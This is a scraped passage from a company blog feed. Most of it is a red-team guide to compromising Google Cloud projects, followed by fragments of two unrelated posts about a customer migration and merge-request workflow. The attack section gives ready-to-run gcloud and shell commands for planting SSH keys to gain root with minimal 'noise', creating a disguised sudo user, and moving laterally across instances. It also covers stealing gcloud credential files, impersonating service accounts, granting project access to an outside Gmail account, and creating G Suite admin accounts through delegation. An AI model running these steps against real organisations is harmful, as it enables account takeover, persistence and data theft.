own key to an existing account, as that will probably make the least noise. You'll want to be careful not to wipe out any keys that already exist in metadata, as that may tip your target off.\n\nCheck the instance for existing SSH keys. Pick one of these users as they are likely to have sudo rights.\n\n```\n$ gcloud compute instances describe [INSTANCE] --zone [ZONE]\n```\n\nLook for a section like the following:\n\n```\n ...\n metadata:\n   fingerprint: QCZfVTIlKgs=\n   items:\n   ...\n   - key: ssh-keys\n     value: |-\n       alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice\n       bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob\n ...\n```\n\nNotice the slightly odd format of the public keys - the username is listed at the beginning (followed by a colon) and then again at the end. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters!\n\nSave the lines with usernames and keys in a new text file called `meta.txt`.\n\nLet's assume we are targeting the user `alice` from above. We'll generate a new key for ourselves like this:\n\n```\n$ ssh-keygen -t rsa -C \"alice\" -f ./key -P \"\" && cat ./key.pub\n```\n\nTake the output of the command above and use it to add a line to the `meta.txt` file you create above, ensuring to add `alice:` to the beggining of your new public key.\n\n`meta.txt` should now look something like this, including the existing keys and the new key you just generated:\n\n```\nalice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice\nbob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob\nalice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice\n```\n\nNow, you can re-write the SSH key metadata for your instance with the following command:\n\n```\n$ gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt\n```\n\nYou can now access a shell in the context of `alice` as follows:\n\n```\nlowpriv@instance:~$ ssh -i ./key alice@localhost\nalice@instance:~$ sudo id\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n##### Create a new privileged user\n\nNo existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target?\n\nYou can follow the same process as above, but just make up a new username. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this:\n\n```\n# define the new account username\nNEWUSER=\"definitelynotahacker\"\n\n# create a key\nssh-keygen -t rsa -C \"$NEWUSER\" -f ./key -P \"\"\n\n# create the input meta file\nNEWKEY=\"$(cat ./key.pub)\"\necho \"$NEWUSER:$NEWKEY\" > ./meta.txt\n\n# update the instance metadata\ngcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt\n\n# ssh to the new account\nssh -i ./key \"$NEWUSER\"@localhost\n```\n##### Grant sudo to existing session\nThis one is so easy, quick, and dirty that it feels wrong...\n\n```\n$ gcloud compute ssh [INSTANCE NAME]\n```\n\nThis will generate a new SSH key, add it to your existing user, and add your existing username to the `google-sudoers` group, and start a new SSH session. While it is quick and easy, it may end up making more changes to the target system than the previous methods.\n\nWe'll talk about this again for lateral movement, but it works perfectly fine for local privilege escalation as well.\n\n##### Using OS Login\n\n[OS Login](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a Google user or service account to a Linux identity, relying on IAM permissions to grant or deny access to Compute Instances.\n\nOS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`.\n\nOS Login with two-factor authentication is [enabled](https://cloud.google.com/compute/docs/oslogin/setup-two-factor-authentication) in the same manner with the metadata key of `enable-oslogin-2fa = TRUE`.\n\nThe following two IAM permissions control SSH access to instances with OS Login enabled. They can be applied at the project or instance level:\n\n- roles/compute.osLogin (no sudo)\n- roles/compute.osAdminLogin (has sudo)\n\nUnlike managing only with SSH keys, these permissions allow the administrator to control whether or not `sudo` is granted.\n\nIf you're lucky, your service account has these permissions. You can simply run the `gcloud compute ssh [INSTANCE]` command to [connect manually as the service account](https://cloud.google.com/compute/docs/instances/connecting-advanced#sa_ssh_manual). Two-factor is only enforced when using user accounts, so that should not slow you down even if it is assigned as shown above.\n\nSimilar to using SSH keys from metadata, you can use this strategy to escalate privileges locally and/or to access other Compute Instances on the network.\n\n## Lateral movement\n\nYou've compromised one VM inside a project. Great! Now let's get some more...\n\nYou can try the following command to get a list of all instances in your current project:\n\n```\n$ gcloud compute instances list\n```\n\n### SSH'ing around\n\nYou can use the local privilege escalation tactics above to move around to other machines. Read through those sections for a detailed description of each method and the associated commands.\n\nWe can expand upon those a bit by [applying SSH keys at the project level](https://cloud.google.com/compute/docs/instances/adding-removing-ssh-keys#project-wide), granting you permission to SSH into a privileged account for any instance that has not explicitly chosen the \"Block project-wide SSH keys\" option.\n\nAfter you've identified the strategy for selecting or creating a new user account, you can use the following syntax.\n\n```\n$ gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt\n```\n\nIf you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to use your current username on other boxes.\n\n### Abusing networked services\n\n#### Some GCP networking tidbits\n\nCompute Instances are connected to networks called VPCs or [Virtual Private Clouds](https://cloud.google.com/vpc/docs/vpc). [GCP firewall](https://cloud.google.com/vpc/docs/firewalls) rules are defined at this network level but are applied individually to a Compute Instance. Every network, by default, has two [implied firewall rules](https://cloud.google.com/vpc/docs/firewalls#default_firewall_rules): allow outbound and deny inbound.\n\nEach GCP project is provided with a VPC called `default`, which applies the following rules to all instances:\n\n- default-allow-internal (allow all traffic from other instances on the `default` network)\n- default-allow-ssh (allow 22 from everywhere)\n- default-allow-rdp (allow 3389 from everywhere)\n- default-allow-icmp (allow ping from everywhere)\n\n#### Meet the neighbors\n\nFirewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances.\n\nYou can get a nice readable view of all the subnets in the current project with the following command:\n\n```\n$ gcloud compute networks subnets list\n```\n\nAnd an overview of all the internal/external IP addresses of the Compute Instances using the following:\n\n```\n$ gcloud compute instances list\n```\n\nIf you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.\n\n#### Enumerating public ports\n\nPerhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.\n\nIn the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may taken ages and could get your source IP blocked.\n\nWhen attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.\n\nWhat we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.\n\n[Firewall rules](https://cloud.google.com/vpc/docs/firewalls) can be applied to instances via the following methods:\n\n- [Network tags](https://cloud.google.com/vpc/docs/add-remove-network-tags)\n- [Service accounts](https://cloud.google.com/vpc/docs/firewalls#serviceaccounts)\n- All instances within a VPC\n\nUnfortunately, there isn't a simple `gcloud` command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.\n\nWe've automated this completely using [this python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum) which will export the following:\n\n- CSV file showing instance, public IP, allowed TCP, allowed UDP\n- nmap scan to target all instances on ports ingress allowed from the public internet (0.0.0.0/0)\n- masscan to target the full TCP range of those instances that allow ALL TCP ports from the public internet (0.0.0.0/0)\n\nFull documentation on that tool is availabe in the [README](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_firewall_enum/blob/master/README.md).\n\n## Cloud privilege escalation\n\nIn this section, we'll talk about ways to potentially increase our privileges within the cloud environment itself.\n\n### Organization-level IAM permissions\n\nMost of the commands in this blog focus on obtaining project-level data. However, it's important to know that permissions can be set at the highest level of \"Organization\" as well. If you can enumerate this info, this will give you an idea of which accounts may have access across all of the projects inside an org.\n\nThe following commands will list the policies set at this level:\n\n```\n# First, get the numeric organization ID\n$ gcloud organizations list\n\n# Then, enumerate the policies\n$ gcloud organizations get-iam-policy [ORG ID]\n```\n\nPermissions you see in this output will be applied to EVERY project. If you don't have access to any of the accounts listed, continue reading to the [Service Account Impersonation](#service-account-impersonation) section below.\n\n### Bypassing access scopes\n\nThere's nothing worse than having access to a powerful service account but being limited by the access scopes of your current OAuth token. But fret not! Just the existence of that powerful account introduces risks which we might still be able to abuse.\n\n#### Pop another box\n\nIt's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of `gcloud compute instances list --quiet --format=json`, look for instances with either the specific scope you want or the `auth/cloud-platform` all-inclusive scope.\n\nAlso keep an eye out for instances that have the default service account assigned (`PROJECT_NUMBER-compute@developer.gserviceaccount.com`).\n\n#### Find service account keys\n\nGoogle states very clearly [**\"Access scopes are not a security mechanism... they have no effect when making requests not authenticated through OAuth\"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).\n\nSo, if we have a powerful service account but a limited OAuth token, we need to somehow authenticate to services without OAuth.\n\nThe easiest way to do this would be to stumble across a [service account key](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance. These are RSA private keys that can be used to authenticate to the Google Cloud API and request a new OAuth token with no scope limitations.\n\nYou can tell which service accounts, if any, have had key files exported for them. This will let you know whether or not it's even worth hunting for them, and possibly give you some hints on where to look. The command below will help.\n\n```\n$ for i in $(gcloud iam service-accounts list --format=\"table[no-heading](email)\"); do\n    echo Looking for keys for $i:\n    gcloud iam service-accounts keys list --iam-account $i\ndone\n```\n\nThese files are not stored on a Compute Instance by default, so you'd have to be lucky to encounter them. When a service account key file is exported from the GCP console, the default name for the file is [project-id]-[portion-of-key-id].json. So, if your project name is `test-project` then you can search the filesystem for `test-project*.json` looking for this key file.\n\nThe contents of the file look something like this:\n\n```\n{\n\"type\": \"service_account\",\n\"project_id\": \"[PROJECT-ID]\",\n\"private_key_id\": \"[KEY-ID]\",\n\"private_key\": \"-----BEGIN PRIVATE KEY-----\\n[PRIVATE-KEY]\\n-----END PRIVATE KEY-----\\n\",\n\"client_email\": \"[SERVICE-ACCOUNT-EMAIL]\",\n\"client_id\": \"[CLIENT-ID]\",\n\"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n\"token_uri\": \"https://accounts.google.com/o/oauth2/token\",\n\"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n\"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/[SERVICE-ACCOUNT-EMAIL]\"\n}\n\n```\n\nOr, if generated from the CLI they will look like this:\n\n```\n{\n\"name\": \"projects/[PROJECT-ID]/serviceAccounts/[SERVICE-ACCOUNT-EMAIL]/keys/[KEY-ID]\",\n\"privateKeyType\": \"TYPE_GOOGLE_CREDENTIALS_FILE\",\n\"privateKeyData\": \"[PRIVATE-KEY]\",\n\"validAfterTime\": \"[DATE]\",\n\"validBeforeTime\": \"[DATE]\",\n\"keyAlgorithm\": \"KEY_ALG_RSA_2048\"\n}\n```\n\nIf you do find one of these files, you can tell the `gcloud` command to re-authenticate with this service account. You can do this on the instance, or on any machine that has the tools installed.\n\n```\n$ gcloud auth activate-service-account --key-file [FILE]\n```\n\nYou can now test your new OAuth token as follows:\n\n```\n$ TOKEN=`gcloud auth print-access-token`\n$ curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=$TOKEN\n```\n\nYou should see `https://www.googleapis.com/auth/cloud-platform` listed in the scopes, which means you are not limited by any instance-level access scopes. You now have full power to use all of your assigned IAM permissions.\n\n#### Steal gcloud authorizations\n\nIt's quite possible that other users on the same box have been running `gcloud` commands using an account more powerful than your own. You'll need local root to do this.\n\nFirst, find what `gcloud` config directories exist in users' home folders.\n\n```\n$ sudo find / -name \"gcloud\"\n```\n\nYou can manually inspect the files inside, but these are generally the ones with the secrets:\n\n- ~/.config/gcloud/credentials.db\n- ~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json\n- ~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto\n- ~/.credentials.json\n\nNow, you have the option of looking for clear text credentials in these files or simply copying the entire `gcloud` folder to a machine you control and running `gcloud auth list` to see what accounts are now available to you.\n\n### Service account impersonation\n\nThere are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):\n\n- Authentication using RSA private keys (covered [above](#find-service-account-keys))\n- Authorization using Cloud IAM policies (covered below)\n- Deploying jobs on GCP services (more applicable to the compromise of a user account)\n\nIt's possible that the service account you are currently authenticated as has permission to impersonate other accounts with more permissions and/or a less restrictive scope. This behavior is authorized by the predefined role called `iam.serviceAccountTokenCreator`.\n\nA good example here is that you've compromised an instance running as a custom service account with this role, and the default service account still exists in the project. As the default service account has the primitive role of Project Editor, it is possibly even more powerful than the custom account.\n\nEven better, you might find a service account with the primitive role of Owner. This gives you full permissions, and is a good target to then grant your own Google account rights to log in to the project using the web console.\n\n`gcloud` has a `--impersonate-service-account` [flag](https://cloud.google.com/sdk/gcloud/reference/#--impersonate-service-account) which can be used with any command to execute in the context of that account.\n\nTo give this a shot, you can try the following:\n\n```\n# View available service accounts\n$ gcloud iam service-accounts list\n\n# Impersonate the account\n$ gcloud compute instances list \\\n    --impersonate-service-account xxx@developer.gserviceaccount.com\n```\n\n### Exploring other projects\n\nIf you're really lucky, either the service account on your compromised instance or another account you've bagged thus far has access to additional GCP projects. You can check with the following command:\n\n```\n$ gcloud projects list\n```\n\nFrom here, you can hop over to that project and start the entire process over.\n\n```\n$ gcloud config set project [PROJECT-ID]\n```\n\n### Granting access to management console\n\nAccess to the [GCP management console](https://console.cloud.google.com/) is provided to user accounts, not service accounts. To log in to the web interface, you can grant access to a Google account that you control. This can be a generic \"@gmail.com\" account, it does not have to be a member of the target organization.\n\nTo grant the primitive role of Owner to a generic \"@gmail.com\" account, though, you'll need to use the web console. `gcloud` will error out if you try to grant it a permission above Editor.\n\nYou can use the following command to grant a user the primitive role of Editor to your existing project:\n\n```\n$ gcloud projects add-iam-policy-binding [PROJECT] \\\n    --member user:[EMAIL] --role roles/editor\n```\n\nIf you succeeded here, try accessing the web interface and exploring from there.\n\nThis is the highest level you can assign using the gcloud tool. To assign a permission of Owner, you'd need to use the console itself.\n\nYou need a fairly high level of permission to do this. If you're not quite there, keep reading.\n\n### Spreading to G Suite via domain-wide delegation of authority\n\n[G Suite](https://gsuite.google.com/) is Google's collaboration and productivity platform which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. Many organizations use some or all of this platform as an alternative to traditional Microsoft AD/Exchange environments.\n\nService accounts in GCP can be granted the rights to programatically access user data in G Suite by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like reading email in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization.\n\nG Suite has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from anything else we've explored in this blog. Permissions are granted to G Suite API calls in a similar fashion to how permissions are granted to GCP APIs. However, G Suite and GCP are two different entities - being in one does not mean you automatically have access to another.\n\nIt is possible that a G Suite administrator has granted some level of G Suite API access to a GCP service account that you control. If you have access to the Web UI at this point, you can browse to IAM -> Service Accounts and see if any of the accounts have \"Enabled\" listed under the \"domain-wide delegation\" column. The column itself may not appear if no accounts are enabled. As of this writing, there is no way to do this programatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.\n\nIt is not enough for you to simply enable this for a service account inside GCP. The G Suite administrator would also have to configure this in the G Suite admin console.\n\nWhether or not you know that a service account has been given permissions inside G Suite, you can still try it out. You'll need the service account credentials exported in JSON format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.\n\nThis topic is a bit tricky... your service account has something called a \"client_email\" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access G Suite API calls directly with that email, even with delegation enabled, you will fail. This is because the G Suite directory will not include the GCP service account's email addresses. Instead, to interact with G Suite, we need to actually impersonate valid G Suite users.\n\nWhat you really want to do is to impersonate a user with administrative access, and then use that access to do something like reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account.\n\nWe've created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_misc/blob/master/gcp_delegation.py) that can do two things - list the user directory and create a new administrative account. Here is how you would use it:\n\n```\n# Validate access only\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com\n\n# List the directory\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com \\\n    --list\n\n# Create a new admin account\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com \\\n    --account pwned\n```\n\nYou can try this script across a range of email addresses to impersonate various users. Standard output will indicate whether or not the service account has access to G Suite, and will include a random password for the new admin account if one is created.\n\nIf you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.",[865,3091,9],{"slug":4396,"featured":6,"template":689},"plundering-gcp-escalating-privileges-in-google-cloud-platform","content:en-us:blog:plundering-gcp-escalating-privileges-in-google-cloud-platform.yml","Plundering Gcp Escalating Privileges In Google Cloud Platform","en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform.yml","en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform",{"_path":4402,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4403,"content":4409,"config":4415,"_id":4417,"_type":14,"title":4418,"_source":16,"_file":4419,"_stem":4420,"_extension":19},"/en-us/blog/proximus-customer-story-clearcase-to-gitlab",{"title":4404,"description":4405,"ogTitle":4404,"ogDescription":4405,"noIndex":6,"ogImage":4406,"ogUrl":4407,"ogSiteName":673,"ogType":674,"canonicalUrls":4407,"schema":4408},"Proximus shares its #movingtoGitLab story","Moving to GitLab resulted in an 80 percent drop in support tickets and an increase in developer productivity.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678603/Blog/Hero%20Images/traffic-at-sunset.jpg","https://about.gitlab.com/blog/proximus-customer-story-clearcase-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Proximus shares its #movingtoGitLab story\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bert Van Eyck\"}],\n        \"datePublished\": \"2019-06-07\",\n      }",{"title":4404,"description":4405,"authors":4410,"heroImage":4406,"date":4412,"body":4413,"category":682,"tags":4414},[4411],"Bert Van Eyck","2019-06-07","\n[Proximus](https://www.proximus.com/) is a telecommunication company providing services to residential, enterprise, and public users. We are the leading provider of telephony, internet, television, and network-based ICT services in Belgium, with more than 2 million customers.\n\n## Our road to GitLab\n\nThe technical divisions of Proximus deliver a big part of the applications and systems required for delivering the best possible service to our end users. It includes all types of capabilities such as network construction, network maintenance, product ordering, product selling, billing, etc.\nSome examples of our development include:\n\n- Our website, [Proximus.be](https://www.proximus.be), on which users can find product info, support info and so much more.\n- A mobile app where everyone can check their usage, products, bills, etc.\n- Television interface.\n- A television app.\n\nTo ensure a performant and stable working environment for our developers, we have been working for several years to create a CI/CD DevOps workflow.\n\nThe first complete chain started in 2014 and used tools like ClearCase, Jenkins, Nexus, etc. By 2015 we had about 200 applications which were using our end-to-end chain to build and deploy in all different environments.\n\nIn 2016, to continue to improve our delivery chain, we considered switching ClearCase to Git. Despite ClearCase being a powerful tool, we noticed that the learning curve and the ease of use of ClearCase was not optimal. Also some of the tools we used were starting to lose compatibility.\n\nWe quickly came across GitLab and decided to try our first setup with [GitLab CE](/blog/gitlab-tiers/) in mid-2016.\n\n## The evolution of GitLab inside Proximus\n\nOur first implementation of Gitlab was rapidly a real success and the popularity of GitLab was increasing exponentially within our developer community. So, we decided to set up a corporate GitLab CE server at Proximus and to promote the creation of all new applications using our existing CI/CD chain with GitLab as source code management.\nIn just one year of using GitLab, we grew to 325 projects and about 600 users.\n\nBecause GitLab was becoming a big part of our tool set, we switched to GitLab EE in Q2 of 2017. This allowed us to use more features of GitLab such as: LDAP groups, push rules, mirror repositories, etc.\nAnd of course, with the enterprise edition you also receive additional support. With the enterprise edition we also started moving applications from ClearCase to GitLab.\n\nWe were also investigating and testing other features to expand our use of GitLab in the meantime:\n\n- Some projects have started using GitLab CI to build.\n- Integration with Jira has been implemented.\n- Currently experimenting with a first setup of GitLab’s global search function in combination with Elasticsearch.\n\nBy the end of 2018 we had grown to almost 1,000 users and 1,700 projects.\n\n## Challenges\n\nOur biggest challenge was to maintain and ensure a stable environment while growing rapidly. When we started using GitLab CI we encountered some issues with the large number of pipelines and jobs being created, which were consuming a lot of our resources. But [as of GitLab 11.6 a feature has been provided to remove pipelines with their job logs when using API](/releases/2018/12/22/gitlab-11-6-released/#pipelines-can-now-be-deleted-by-project-maintainers-using-api), which helped a lot.\n\n## Results\n\nSince we started using GitLab, we have been able to provide our developers with faster setup and support. Another very noticeable side effect of switching to GitLab was the significant drop in the number of support tickets created by the developers. Our first full year of using GitLab inside our CI/CD setup resulted in **80 percent** fewer tickets.\n\nEven in 2018, after our total number of users had grown to almost 1,000, the number of projects had multiplied by five and we migrated 75 applications to GitLab. We still had **65 percent** fewer tickets.\n\nIn the future, we will continue looking into expanding our GitLab environment and we hope to continue the positive evolution together with the support of GitLab.\n",[267,751,231,910,9],{"slug":4416,"featured":6,"template":689},"proximus-customer-story-clearcase-to-gitlab","content:en-us:blog:proximus-customer-story-clearcase-to-gitlab.yml","Proximus Customer Story Clearcase To Gitlab","en-us/blog/proximus-customer-story-clearcase-to-gitlab.yml","en-us/blog/proximus-customer-story-clearcase-to-gitlab",{"_path":4422,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4423,"content":4428,"config":4434,"_id":4436,"_type":14,"title":4437,"_source":16,"_file":4438,"_stem":4439,"_extension":19},"/en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions",{"title":4424,"description":4425,"ogTitle":4424,"ogDescription":4425,"noIndex":6,"ogImage":2028,"ogUrl":4426,"ogSiteName":673,"ogType":674,"canonicalUrls":4426,"schema":4427},"Pursuing faster time-to-merge for wider community contributions","How introducing more explicit contribution stages lowered the time it takes to merge a community contribution.","https://about.gitlab.com/blog/pursuing-faster-time-to-merge-for-wider-community-contributions","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Pursuing faster time-to-merge for wider community contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nick Veenhof\"}],\n        \"datePublished\": \"2022-09-13\",\n      }",{"title":4424,"description":4425,"authors":4429,"heroImage":2028,"date":4430,"body":4431,"category":10,"tags":4432},[2812],"2022-09-13","\n\nOne of GitLab's core strategies is to [build on our open core\nstrength](/company/strategy/#2-build-on-our-open-core-strength). We believe that building a\nstrong community of contributors is key to the long-term success of GitLab. We believe in a [dual-flywheel\nstrategy](/company/strategy/#dual-flywheels) that focuses on both product contributions from\nwithin our GitLab engineering team and community contributions. \n\nOur goal is to grow to 1000 contributors per month. The saying is that \"All roads lead to Rome,\" but of course not all of those roads are the most efficient ways to get there. To succeed, contributing to GitLab must be a rewarding and incentivizing experience that\nmotivates contributors to come back. One of the strategic choices we made in the [contributor\nsuccess](https://about.gitlab.com/handbook/marketing/developer-relations/contributor-success/) team is the route of being as\nresponsive and clear as we can about the next steps, using processes and automation. \n\n## Problem statement\n\nSo where do we start? On average GitLab has over [550 open merge\nrequests](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&state=opened&label_name[]=Community%20contribution).\nWe wanted to focus on the _ready enough_ problem. When is an MR ready for review? And when is an MR still in development? In\nboth cases collaboration is required, but having a formal handoff — meaning this contribution is ready for a review — helps in\nunderstanding who is blocked from moving forward. Before a merge request can find its way into GitLab, it needs to get a\nreview from at least one maintainer.\n\nHow do we know when to ask specific maintainers of our product areas to put their focus on reviewing these merge requests? When is a merge request _ready enough_ for a thorough review? What does _ready enough_ even mean?\n\nSome OSS communities use crowdsourced reviews for contributions to make sure the project maintainers don’t need to take on everything by themselves. For example, in the Drupal community there is the concept of [Reviewed and Tested by the Community](https://www.drupal.org/community/contributor-guide/task/triage-the-drupal-core-rtbc-queue). At GitLab we have MR coaches and community help to make sure everything is as ready as can be before involving the maintainers.\n\nThe GitLab bot and our MR coaches try to assist the wider community contributors on their way. We also had a ping-pong label that tried to signify if a community contributor had reacted and it was ‘ping ponged 🏓’ back to the GitLab team members. This pingpong label didn’t take the context into account. It was a great iterative and [boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions) to know who was up next (the author or the reviewer). But it had a lot of false-positives and caused confusion to both the maintainers and the community contributors.\n\nSo where do we go from here? How do we get a better grasp on this _ready enough_ problem? Let’s start by asking for help from our recommended reading list, [High-Output Management](/handbook/leadership/high-output-management/). Author Andrew S. Grove states: “A very important way to increase productivity is to arrange the work flow inside our black box so that it will be characterized by high output per activity, which is to say high-leverage activities.”\n\n## Introducing workflow labels\n\nFor a while, GitLab team members were using workflow labels to signify the state of a merge request. It wasn’t always used across all teams, but they were available. More specifically we’re looking at the following labels:\n\n- `workflow::ready for review`\n- `workflow::in dev`\n- `workflow::blocked`\n\nEach wider community contributor is now [able to change these labels themselves](https://docs.gitlab.com/ee/development/contributing/#contribution-flow). By using `@gitlab-bot ready`, it sets the state to `workflow::ready for review` and assigns a reviewer. The reviewer is able to set it back to `workflow::in dev` if there are still items to be addressed. Other wider community members can also leave comments or suggestions for improvement, and then [set the label](https://about.gitlab.com/handbook/engineering/quality/triage-operations/#reactive-label-command) back to `workflow::in dev`, or set other labels to help triage these merge requests.\n\n## What have we learned so far?\n\nWe started using this system over two months ago. We now know that around 20% of MRs on average are in a \"ready for review\"\nstate. Those contributors are blocked and waiting for an answer to either continue to improve the merge request or get\nit merged if there are no more comments left. We also noticed that some merge requests were not getting a lot of\nattention. We did an async retrospective and feedback session with the GitLab team members and the wider community in order to find an answer on how we can\n[improve the time it takes before a review is made](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/13718) for\ncontributions that were ready for a review. We’re still processing that feedback, but are looking to try some of these\nsuggestions, learn from them, and iterate. Even though GitLab cannot promise timely reviews, we can certainly try to\nbuild in mechanisms, and understand where we see limits, to navigate towards better processes. When we started out, we\nhad a median time of 17 days that an MR was in the ready for review state. Today that median time has been reduced to five days!\n\nThe median Open Community MR Age (OCMA) has also dropped from 139 days in April to 78 days in August. Maybe it is a\ncoincidence that we reached an all-time high of 126 contributors in August? Either way, all of the steps allowed our amazing wider\ncommunity 